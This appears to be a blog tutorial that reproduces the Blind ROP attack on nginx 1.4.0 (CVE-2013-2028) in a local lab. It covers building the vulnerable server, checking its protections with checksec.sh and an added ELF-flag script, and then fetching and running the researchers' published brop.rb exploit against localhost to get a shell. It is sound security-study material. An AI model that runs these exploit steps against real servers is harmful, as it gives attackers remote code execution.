This topic consists of 3 sessions:
- BROP Principle - dump memory to attacker and do exploit
- BROP Practice1 - attack conduct
- BROP Practice2 - code analysis
Following the first session, which covered the principle of the BROP attack, this page discusses how to carry out the real exploit on a Linux system.
This session is more of a tutorial on how I reproduced one of the three attacks conducted by the authors (specifically, attacking nginx 1.4.0 through a buffer overflow bug, CVE-2013-2028, and finally executing a shell) on my PC.
Setting Up Nginx-1.4.0
First, we need to set up the server environment: nginx 1.4.0.
Download the nginx 1.4.0 source code:
$ wget nginx.org/download/nginx-1.4.0.tar.gz
$ tar zxvf nginx-1.4.0.tar.gz
$ cd nginx-1.4.0
$ ./configure --sbin-path=/usr/local/nginx/nginx --conf-path=/usr/local/nginx/nginx.conf --pid-path=/usr/local/nginx/nginx.pid --with-http_ssl_module
Before compiling, edit the generated Makefile so that nginx is built with stack canary protection:
$ vi objs/Makefile
Then compile it:
$ make -j4
$ sudo make install
At this point, it is installed in the /usr/local/nginx folder. If you check it with checksec.sh:
$ wget www.trapkit.de/tools/checksec.sh
$ chmod +x ./checksec.sh
$ ./checksec.sh --file /usr/local/nginx/nginx
You will get the following result:
This shows that the binary already has NX and stack canary protection.
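To make explicit what checksec.sh is reporting, here is an added example (not part of the original post, and not checksec.sh's own code) that reads the same properties straight from the ELF headers: NX from the PT_GNU_STACK program header flags, the stack canary from the presence of the __stack_chk_fail symbol name, and PIE from e_type. The build_elf helper and the header-only images it constructs are demonstration inputs, not real binaries.

```python
import struct
import sys

ET_DYN = 3                 # e_type of a position-independent executable
PT_GNU_STACK = 0x6474E551  # program header that carries the stack permissions
PF_X = 1                   # executable bit in p_flags

def elf_hardening(data: bytes) -> dict:
    """Report NX, stack canary and PIE for an ELF64 little-endian image, checksec-style."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("only ELF64 little-endian is handled here")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    nx = False  # without a PT_GNU_STACK header the kernel grants an executable stack
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    # checksec.sh looks for __stack_chk_fail in the symbol table; a raw string
    # scan is a cruder stand-in that needs no section parsing
    canary = b"__stack_chk_fail" in data
    return {"nx": nx, "canary": canary, "pie": e_type == ET_DYN}

def build_elf(e_type: int, stack_flags, canary_symbol: bool) -> bytes:
    """Construct a minimal header-only ELF64 image (constructed demo input)."""
    phnum = 0 if stack_flags is None else 1
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0x400000,
                               64, 0, 0, 64, 56, phnum, 64, 0, 0)
    phdr = b"" if stack_flags is None else struct.pack(
        "<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    tail = b"__stack_chk_fail\x00" if canary_symbol else b""
    return ehdr + phdr + tail

def report(path: str) -> str:
    """One checksec-like summary line for the binary at path."""
    with open(path, "rb") as f:
        flags = elf_hardening(f.read())
    return "  ".join(f"{k.upper()}: {'yes' if v else 'no'}" for k, v in flags.items())

if __name__ == "__main__":
    # usage: python3 elfcheck.py /usr/local/nginx/nginx
    if len(sys.argv) > 1:
        print(report(sys.argv[1]))
    else:  # no path given: show the flags of a constructed non-PIE, NX, canary image
        print(elf_hardening(build_elf(2, 6, True)))
```

Run against the nginx binary built above, the NX and canary fields should match the checksec.sh output; the PIE field shows whether the executable is loaded at a fixed address.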
Before running nginx, we need to modify its configuration to make it run with 4 worker processes:
$ vi /usr/local/nginx/nginx.conf
Then we just run it with:
$ sudo /usr/local/nginx/nginx
Running the BROP Attack
Now let's see how to do the BROP attack. It is quite simple, since the authors have already written an nginx-specific attack script in Ruby.
Download the exploit script:
$ wget www.scs.stanford.edu/brop/nginx-1.4.0-exp.tgz
$ tar zxvf nginx-1.4.0-exp.tgz
$ cd nginx-1.4.0-exp
And run it by simply executing:
$ ./brop.rb 127.0.0.1
If everything is OK, it will exploit nginx-1.4.0 using the approach I described here, and finally print the id of the exploited shell's owner:
If there is any problem and you want to rerun the script, first remove the state.bin file (or even restart nginx), then run brop.rb again:
$ rm -f ./state.bin
$ ./brop.rb 127.0.0.1
In the next session, I will analyse the Ruby script and show how the attack is carried out at the code level.